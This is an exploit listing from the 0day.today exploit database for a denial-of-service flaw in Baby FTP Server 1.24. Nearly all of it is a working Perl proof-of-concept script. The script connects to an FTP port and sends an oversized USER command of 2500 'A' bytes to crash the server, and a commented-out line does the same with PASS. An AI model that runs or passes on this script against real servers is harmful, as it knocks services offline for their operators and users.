[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Baby FTP Server 1.24 - Denial Of Service

Author
Chako
Risk
[
Security Risk High
]
0day-ID
0day-ID-20940
Category
dos / poc
Date add
26-06-2013
Platform
windows
#!/usr/bin/perl
use IO::Socket;
  
$TARGET = "127.0.0.1";
$PORT   = 21;
$JUNK = "\x41" x 2500;
  
$PAYLOAD = "USER ".$JUNK."\r\n";
#$PAYLOAD = "PASS ".$JUNK."\r\n";
 
  
$SOCKET = IO::Socket::INET->new(Proto=>'TCP', 
                                PeerHost=>$TARGET, 
                                PeerPort=>$PORT) or die "Error: $TARGET :$PORT\n";
  
$SOCKET->send($PAYLOAD);
  
close($SOCKET);

#  0day.today [2024-07-05]  #